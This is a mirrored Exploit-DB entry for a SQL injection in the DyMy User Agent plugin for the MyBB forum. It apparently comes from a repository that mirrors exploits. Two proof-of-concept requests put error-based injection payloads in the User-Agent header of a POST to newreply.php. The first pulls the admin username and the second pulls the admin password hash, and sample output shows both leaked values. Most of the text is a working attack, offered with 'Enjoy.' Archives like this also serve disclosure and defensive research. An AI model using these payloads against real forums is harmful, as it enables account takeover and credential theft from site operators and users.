bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/23359.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

46 lines
No EOL
1.7 KiB
Text
Raw Permalink Blame History

############################################################################
# Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. #
# Author: JoinSe7en #
# Date : 13 Dec 2012 #
# Tested on : Linux #
# Category : Web Applications #
# Software Link : http://mods.mybb.com/view/dymy-user-agent #
############################################################################
[*] PoC (receive admin username)
We fire up HTTP Live Headers or a similar tool, post something and press 'replay'.
We then replace our user agent with the following Query:
POST http://localhost/mybb/newreply.php?ajax=1
HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #
Output:
SQL Error:
1062 - Duplicate entry 'admin1' for key 'group_key'
+------------------------------------------------------------------+
[*] PoC (receive admin password)
We then replace our user agent with the following Query:
POST http://localhost/mybb/newreply.php?ajax=1
HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #
Output:
SQL Error:
1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'
+------------------------------------------------------------------+
Enjoy.
Reference in a new issue View git blame Copy permalink